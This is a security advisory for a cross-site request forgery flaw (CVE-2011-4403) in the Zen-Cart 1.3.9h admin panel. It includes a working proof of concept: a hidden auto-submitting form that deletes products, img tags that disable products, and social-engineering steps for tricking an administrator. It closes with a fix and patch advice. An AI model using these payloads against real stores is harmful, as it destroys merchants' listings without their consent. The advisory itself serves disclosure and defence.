Zen-Cart 1.3.9h Cross Site Request Forgery

`*Advisory Information*  
  
Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products  
Date published: 2012-02-10 01:59:45 AM  
upSploit Ref: UPS-2011-0018  
  
CVE REF: CVE-2011-4403  
  
*Advisory Summary*  
  
An attacker can force an administrator to delete or disable products from  
within his store.  
  
*Vendor*  
  
Zen-Cart  
  
*Affected Software*  
  
Zen-Cart v1.3.9h  
  
Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source  
shopping cart software. The ecommerce web site design program is being  
developed by a group of like-minded shop owners, programmers, designers,  
and consultants that think ecommerce web design could be and should be done  
differently.  
  
*Description of Issue*  
  
This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By  
submitting this form from any location an attacker can cause the  
administrator to delete / disable products from his store.  
  
*PoC*  
  
Requirements  
  
1. Admin user (target) must have a valid session id. Even if they have  
closed the admin window, this attack is still successful  
2. The attacker must obtain the admin url  
* Social Engineer an admin user (trick them)  
* Packet Capture  
* Email headers  
* Invoice print out  
* * I know these have been addressed in your security forum topics,  
but most users are not aware of these issues  
3. The attacker must obtain the product id  
* This is public information  
4. The attack must then social engineer (trick them) into loading the page  
* Email with images  
* Post a forum topic with the images  
* Link them to a page on the attacker’s server  
  
Proof of Concept  
  
Delete:  
  
This form can be hidden and made to submit automatically on page load:  
  
<form name="products" action="  
http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm"  
method="post">  
<label for="securityToken">Security Token</label><br/><input type="text"  
name="securityToken" value="Can be anything " /><br/><br/>  
<label for="products_id">Products ID</label><br/><input type="text"  
name="products_id" value="329"><br/><br/>  
<label for="product_categories[]">Products Category</label><br/><input  
type="text" value="48" name="product_categories[]"><br/><br/>  
<input type="submit" border="0" alt="Delete" value=" Delete Product">  
</form>  
  
Disable:  
  
<img src="  
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1  
"/>  
<img src="  
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2  
"/>  
<img src="  
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3  
"/>  
<img src="  
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4  
"/>  
<img src="  
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5  
"/>  
  
Proposed Solution  
  
* Add the security token conditional statement to the  
delete_product_confirm.php for all product types  
* This should be applied to all requests made within the admin control  
panel rather than just key operations  
  
*Credits*  
  
DisK0nn3cT  
  
*References*  
  
http://www.zen-cart.com/  
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)  
  
*Patch/Fix*  
  
Update to the latest version  
`